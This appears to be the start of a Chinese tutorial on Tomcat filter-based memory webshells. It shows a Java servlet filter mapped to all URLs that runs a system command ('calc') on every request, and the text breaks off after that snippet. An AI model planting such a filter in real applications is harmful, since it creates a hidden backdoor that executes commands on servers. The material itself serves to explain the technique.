tomcat-filter内存马
简要描述
众所周知,servlet 有过滤机制,过滤机制有两种实现方法,可以通过注释实现,亦可以通过 web.xml
配置文件实现
注释实现
package com.sec.filter;
import javax.servlet.*;
import javax.servlet.annotation.WebFilter;
import java.io.IOException;
@WebFilter("/*")
public class FilterDemo implements Filter {
public void init(FilterConfig filterConfig) throws ServletException {
}
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
Runtime.getRuntime().exec("calc");
filterChain.doFilter(servletRequest,servletResponse);
}